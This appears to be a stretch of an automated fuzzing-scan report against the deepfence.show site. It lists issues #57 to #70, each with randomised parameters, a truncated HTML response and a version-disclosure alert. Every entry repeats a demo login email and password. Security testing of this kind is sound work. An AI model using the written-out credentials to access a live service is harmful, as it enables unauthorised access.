[(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #57\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioENMtnc\nDemoUser1# DKd9LF\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #58\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioB1JGYVAStIEPfX\nDemoUser1# idGZYwE\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #59\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioLm3OxVJbXE1nbD\nDemoUser1# MbJtmENKZXFJav\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #60\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioMS2Iahdc\nDemoUser1# xiUksUQsBiNRqnJ\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #61Scan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOATutTZ5\nDemoUser1# kp63YhBeLLs5W5C\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #62\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioYfGJfLtML2\nDemoUser1# OA1sc0BdBWFCsh\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #63\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioYXchFoasZP0J\nDemoUser1# wtws2vUCk3fU\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.ioDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #64\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iopS789JLatAttSi\nDemoUser1# ryoV4qivIZ3yu\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #65\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@ NE7Lh6kRMkideepfence.io\nDemoUser1# xE8LYGX0XS\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #66\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioge8Hgq\nDemoUser1# 9D2zUe3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #67\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io6Bv3KAUeb\nDemoUser1# IAd6GQDLJP57EC\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #68\nScan Fuzzing Scan\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioF7h8rWW9Zc\nDemoUser1# lItyXnxdL2XDqz\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #69\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioNR62HV78zfFMX\nDemoUser1# AoiQgSWB3JDfV93\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #70\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioeYMP2YsbK\nDemoUser1# YNQddocgAiiVj\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 